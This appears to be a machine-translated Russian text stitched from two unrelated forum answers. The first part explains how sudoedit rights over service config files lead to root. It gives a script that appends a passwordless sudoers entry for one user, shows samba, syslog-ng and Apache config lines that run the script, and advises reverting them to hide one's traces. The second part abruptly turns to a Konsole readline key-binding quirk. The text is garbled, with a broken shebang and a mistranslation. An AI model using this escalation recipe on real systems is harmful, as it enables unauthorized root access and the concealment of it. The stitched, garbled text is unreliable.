Следует отметить, что даже sudoedit {.../whatever.conf}
может представлять угрозу безопасности.
Создать сценарий оболочки/tmp/make_me_root.sh
!#/bin/sh
if [[ ! `grep -c 'domscheit ALL=(ALL) NOPASSWD: ALL' /etc/sudoers` ]] ; then
echo 'domscheit ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
fi
и вызовите этот скрипт в файле конфигурации. Я знаю несколько примеров, когда этот подход работает :
.
samba-> команда log nt token
log nt token command = /tmp/make_me_root.sh
syslog -ng-> программа :Отправка сообщений во внешние приложения
log {
source{ system() } ;
destination { program("/tmp/make_me_root.sh") };
};
Apache-> CustomLog
CustomLog "|/tmp/make_me_root.sh"
Я предполагаю, что этот список можно продолжать до бесконечности.
Все, что вам нужно сделать, это перезапустить службу. Конечно, как только вы станете root, вы вернете такие строки конфигурации, чтобы стереть свои следы.
Это Konsole -специфическая функция, представленная в фиксации 5ba34471 еще в 2012 году.
Ссылка :на это Привилегированный пользователь вопрос
Краткое изложение механизма, первоначально описанного в связанном вопросе суперпользователя, выглядит следующим образом :Super_L
+ letter
в Konsole отправляет ^X@s<letter>
. Первая часть «переводится» в «возможные -имена хостов -завершения» с помощью привязок клавиш readline.(bind -p
показывает"\C-x@": possible-hostname-completions
). Оставшаяся часть("s<letter>"
)будет напечатана в следующем запросе.